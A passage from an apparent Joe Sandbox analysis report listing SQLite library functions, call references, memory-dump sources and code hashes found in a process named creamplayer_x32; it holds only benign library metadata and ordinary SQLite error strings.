                                                                                                    • sqlite3_prepare.SQLITE3 ref: 60969166
                                                                                                    • sqlite3_errmsg.SQLITE3 ref: 60969172
                                                                                                      • Part of subcall function 609258A8: sqlite3_log.SQLITE3 ref: 609258E5
                                                                                                    • sqlite3_errcode.SQLITE3 ref: 6096918A
                                                                                                      • Part of subcall function 609251AA: sqlite3_log.SQLITE3 ref: 609251E8
                                                                                                    • sqlite3_step.SQLITE3 ref: 60969197
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_log$sqlite3_errcodesqlite3_errmsgsqlite3_preparesqlite3_step
                                                                                                    • String ID:
                                                                                                    • API String ID: 2877408194-0
                                                                                                    • Opcode ID: 06185e76a961c89383dca1620ea17d5683e825aa4cba78efc797247d66345ea8
                                                                                                    • Instruction ID: d4ebd4c9a05a553e526e78eaaf80584f3afcfe73b3175c4c6dada352db343273
                                                                                                    • Opcode Fuzzy Hash: 06185e76a961c89383dca1620ea17d5683e825aa4cba78efc797247d66345ea8
                                                                                                    • Instruction Fuzzy Hash: 9F0186B091C3059BE700EF29C88525DFBE9EFA5314F11892DA89987384E734C940CB86
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_freesqlite3_mprintfsqlite3_value_blobsqlite3_value_bytes
                                                                                                    • String ID:
                                                                                                    • API String ID: 1163609955-0
                                                                                                    • Opcode ID: c446836a4840d302dbdc97fcf3f25a19881b43244be54ce00609cbc101420811
                                                                                                    • Instruction ID: 8e0d1a1b7fe9adeaf330fda5a565ce202833de3a42fcd494fa905fee92021967
                                                                                                    • Opcode Fuzzy Hash: c446836a4840d302dbdc97fcf3f25a19881b43244be54ce00609cbc101420811
                                                                                                    • Instruction Fuzzy Hash: F6F0C8716282145FC3106F3994816697BE6DFA6758F0144A9F584CB314DB75CC82C742
                                                                                                    APIs
                                                                                                    • sqlite3_prepare_v2.SQLITE3 ref: 609615BA
                                                                                                    • sqlite3_step.SQLITE3 ref: 609615C9
                                                                                                    • sqlite3_column_int.SQLITE3 ref: 609615E1
                                                                                                      • Part of subcall function 6091D4F4: sqlite3_value_int.SQLITE3 ref: 6091D50C
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 609615EE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_column_intsqlite3_finalizesqlite3_prepare_v2sqlite3_stepsqlite3_value_int
                                                                                                    • String ID:
                                                                                                    • API String ID: 4265739436-0
                                                                                                    • Opcode ID: edb1a347b7ee41d63e69a54b369763b34702b79c0c254a7699785c0090147395
                                                                                                    • Instruction ID: 970f7a8085286b868af170b9ae73916577c28f03d50975cfa6e3c5bd991c66ad
                                                                                                    • Opcode Fuzzy Hash: edb1a347b7ee41d63e69a54b369763b34702b79c0c254a7699785c0090147395
                                                                                                    • Instruction Fuzzy Hash: BE01E4B0D083049BEB10EF69C58575EFBF9EFA5314F00896DE8A997380E775D9408B82
                                                                                                    APIs
                                                                                                    • sqlite3_initialize.SQLITE3 ref: 6092A638
                                                                                                      • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 6092A64F
                                                                                                    • strcmp.MSVCRT ref: 6092A66A
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 6092A67D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mutex_enter$sqlite3_initializesqlite3_mutex_leavestrcmp
                                                                                                    • String ID:
                                                                                                    • API String ID: 1894734062-0
                                                                                                    • Opcode ID: 1480f87154849f1cdf239baa72c9ff1b5e3c835899009c68b4affe8256d9fce5
                                                                                                    • Instruction ID: 0dacd04717b96a229033e5bf385d74358d6efc238696297f04088f4a0acd15ee
                                                                                                    • Opcode Fuzzy Hash: 1480f87154849f1cdf239baa72c9ff1b5e3c835899009c68b4affe8256d9fce5
                                                                                                    • Instruction Fuzzy Hash: EBF0B4726243044BC7006F799CC164A7FAEEEB1298B05802CEC548B319EB35DC0297A1
                                                                                                    APIs
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 609084E9
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 60908518
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 60908528
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 6090855B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                    • String ID:
                                                                                                    • API String ID: 1477753154-0
                                                                                                    • Opcode ID: dbb0a767127359d75753d9f151f7b9e03affe710ab86404e29d94d971225fba8
                                                                                                    • Instruction ID: c41a4d3f3efa942db11cbd34a9101edfe28f26dd6f673ba1da0d5803e4a0adbd
                                                                                                    • Opcode Fuzzy Hash: dbb0a767127359d75753d9f151f7b9e03affe710ab86404e29d94d971225fba8
                                                                                                    • Instruction Fuzzy Hash: FD01A4B05093048BDB40AF25C5D97CABBA5EF15718F0884BDEC894F34AD7B9D5448BA1
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_log
                                                                                                    • String ID: into$out of
                                                                                                    • API String ID: 632333372-1114767565
                                                                                                    • Opcode ID: 05e60a680804dc8d75cc30d301a58b6784d3cbcabfb13c7dcba40214300a3b29
                                                                                                    • Instruction ID: de20b162988cb891a2f8fbcf22309076e3e21d241eadb06c465d82de9f0e8d92
                                                                                                    • Opcode Fuzzy Hash: 05e60a680804dc8d75cc30d301a58b6784d3cbcabfb13c7dcba40214300a3b29
                                                                                                    • Instruction Fuzzy Hash: 91910170A043149BDB26CF28C88175EBBBABF65308F0481E9E858AB355D7B5DE85CF41
                                                                                                    APIs
                                                                                                      • Part of subcall function 60918408: sqlite3_value_text.SQLITE3 ref: 60918426
                                                                                                    • sqlite3_free.SQLITE3 ref: 609193A3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_freesqlite3_value_text
                                                                                                    • String ID: (NULL)$NULL
                                                                                                    • API String ID: 2175239460-873412390
                                                                                                    • Opcode ID: 2d639d8f8789be8f4f2115c7e339461789bfa1512606a4b94e85873a15b94a2d
                                                                                                    • Instruction ID: 63658e955800b40111a930d2026d12727b3b294c4be858d68b3f7c51d7abf176
                                                                                                    • Opcode Fuzzy Hash: 2d639d8f8789be8f4f2115c7e339461789bfa1512606a4b94e85873a15b94a2d
                                                                                                    • Instruction Fuzzy Hash: E3514B31F0825A8EEB258A68C89479DBBB6BF66304F1441E9C4A9AB241D7309DC6CF01
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_log
                                                                                                    • String ID: -- $d
                                                                                                    • API String ID: 632333372-777087308
                                                                                                    • Opcode ID: 2197877c990d2cc598be623123ad695ba2ed3a88a0fc98749b4c643aad0a3996
                                                                                                    • Instruction ID: d45f625f7ed72e8bd0cbe86fb5af212c953cff4c7e5ffbb26f6c4a79540968e1
                                                                                                    • Opcode Fuzzy Hash: 2197877c990d2cc598be623123ad695ba2ed3a88a0fc98749b4c643aad0a3996
                                                                                                    • Instruction Fuzzy Hash: FB51F674A043689BDB26CF28C980789BBFABF55304F1481D9E89CAB341C7759E85CF40
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_log
                                                                                                    • String ID: string or blob too big$|
                                                                                                    • API String ID: 632333372-330586046
                                                                                                    • Opcode ID: b6301cf988e6664baaa8b4960c9a349f418ad1f33ca54faa928bbeacb0d503e6
                                                                                                    • Instruction ID: 65a9847582dc10a4f4f17f1c4fc8d82f10366072c52f03016cacc5a11d353e3e
                                                                                                    • Opcode Fuzzy Hash: b6301cf988e6664baaa8b4960c9a349f418ad1f33ca54faa928bbeacb0d503e6
                                                                                                    • Instruction Fuzzy Hash: 4D51B9749083689BCB22CF28C985789BBF6BF59314F1086D9E49897351C775EE81CF41
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_log
                                                                                                    • String ID: d$|
                                                                                                    • API String ID: 632333372-415524447
                                                                                                    • Opcode ID: b41da94c8e0873fb31ce46b9bf1ec845f2d469f37e36bd2a55cc8f8885e561b5
                                                                                                    • Instruction ID: dac03e427e93f591f5d1737f90c886445feec93ea56e6f6f32424ebbe55d5cce
                                                                                                    • Opcode Fuzzy Hash: b41da94c8e0873fb31ce46b9bf1ec845f2d469f37e36bd2a55cc8f8885e561b5
                                                                                                    • Instruction Fuzzy Hash: 50510970A04329DBDB26CF19C981799BBBABF55308F0481D9E958AB341D735EE81CF41
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_logsqlite3_value_text
                                                                                                    • String ID: string or blob too big
                                                                                                    • API String ID: 2320820228-2803948771
                                                                                                    • Opcode ID: 4552165c49a92a3f1eebbde7746405f837ee0ef0562a3825501d2540ddfe4a5c
                                                                                                    • Instruction ID: 1f8da1134a73d261049fdcd83983d84c916c8a3f87851362e697cdb17b1d2bab
                                                                                                    • Opcode Fuzzy Hash: 4552165c49a92a3f1eebbde7746405f837ee0ef0562a3825501d2540ddfe4a5c
                                                                                                    • Instruction Fuzzy Hash: F631D9B0A083249BCB25DF28C881799B7FABF69304F0085DAE898A7301D775DE81CF45
                                                                                                    APIs
                                                                                                    • sqlite3_aggregate_context.SQLITE3 ref: 60914096
                                                                                                    • sqlite3_value_numeric_type.SQLITE3 ref: 609140A2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_aggregate_contextsqlite3_value_numeric_type
                                                                                                    • String ID:
                                                                                                    • API String ID: 3265351223-3916222277
                                                                                                    • Opcode ID: 46809e466d9dc696839b8d734d1d71a7cd961db8d22299a3a9f395bc6b436a6c
                                                                                                    • Instruction ID: a3c0f903ff645dd1c5a8146eaa2078e963ad6c1b8d1bbf61d5d4caeb1888773d
                                                                                                    • Opcode Fuzzy Hash: 46809e466d9dc696839b8d734d1d71a7cd961db8d22299a3a9f395bc6b436a6c
                                                                                                    • Instruction Fuzzy Hash: 19119EB0A0C6589BDF059F69C4D539A7BF6AF39308F0044E8D8D08B205E771CD94CB81
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_stricmp
                                                                                                    • String ID: log
                                                                                                    • API String ID: 912767213-2403297477
                                                                                                    • Opcode ID: 32625358f7d37366d1c1d188942de81712d107425b8b720a67b4b84d1adec0cd
                                                                                                    • Instruction ID: cbf508da25866b0a35bc2ca480d64d7c482f0664b0359b741109bd545b4f9ff5
                                                                                                    • Opcode Fuzzy Hash: 32625358f7d37366d1c1d188942de81712d107425b8b720a67b4b84d1adec0cd
                                                                                                    • Instruction Fuzzy Hash: FD11DAB07087048BE725AF66C49535EBBB3ABA1708F10C42CE4854B784C7BAC986DB42
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_strnicmp
                                                                                                    • String ID: SQLITE_
                                                                                                    • API String ID: 1961171630-787686576
                                                                                                    • Opcode ID: 6b56a851e7df47422a7a29131339b4dfcb3302745a705f9abe90012807219487
                                                                                                    • Instruction ID: 6d5ef3c0fd507030b5e8170497320435726bf3f0db30f2d6f2734bcd7f756fb3
                                                                                                    • Opcode Fuzzy Hash: 6b56a851e7df47422a7a29131339b4dfcb3302745a705f9abe90012807219487
                                                                                                    • Instruction Fuzzy Hash: 2501D6B190C3505FD7419F29CC8075BBFFAEBA5258F10486DE89687212D374DC81D781
                                                                                                    APIs
                                                                                                    • sqlite3_value_bytes.SQLITE3 ref: 6091A1DB
                                                                                                    • sqlite3_value_blob.SQLITE3 ref: 6091A1FA
                                                                                                    Strings
                                                                                                    • Invalid argument to rtreedepth(), xrefs: 6091A1E3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_value_blobsqlite3_value_bytes
                                                                                                    • String ID: Invalid argument to rtreedepth()
                                                                                                    • API String ID: 1063208240-2843521569
                                                                                                    • Opcode ID: 11a8b631faa983fdd1b04a57150add771201859657fb9a8a7ca9793758d49f10
                                                                                                    • Instruction ID: c9489564a96cd83e586e3a08c251b8a8c74d553169181c25a19da25ffef599d7
                                                                                                    • Opcode Fuzzy Hash: 11a8b631faa983fdd1b04a57150add771201859657fb9a8a7ca9793758d49f10
                                                                                                    • Instruction Fuzzy Hash: 0FF0A4B2A0C2589BDB00AF2CC88255577A6FF24258F1045D9E9858F306EB34DDD5C7D1
                                                                                                    APIs
                                                                                                    • sqlite3_soft_heap_limit64.SQLITE3 ref: 609561D7
                                                                                                      • Part of subcall function 6092A43E: sqlite3_initialize.SQLITE3 ref: 6092A450
                                                                                                      • Part of subcall function 6092A43E: sqlite3_mutex_enter.SQLITE3 ref: 6092A466
                                                                                                      • Part of subcall function 6092A43E: sqlite3_mutex_leave.SQLITE3 ref: 6092A47F
                                                                                                      • Part of subcall function 6092A43E: sqlite3_memory_used.SQLITE3 ref: 6092A4BA
                                                                                                    • sqlite3_soft_heap_limit64.SQLITE3 ref: 609561EB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_soft_heap_limit64$sqlite3_initializesqlite3_memory_usedsqlite3_mutex_entersqlite3_mutex_leave
                                                                                                    • String ID: soft_heap_limit
                                                                                                    • API String ID: 1251656441-405162809
                                                                                                    • Opcode ID: 0a3178e3d5348c0d1dba646aca47308acc52713326f376e4eba91e5107f5ba07
                                                                                                    • Instruction ID: 8891d4bbc0f5aef5547f00e3070395c34840fc2012d087b050684f6162b0ba7d
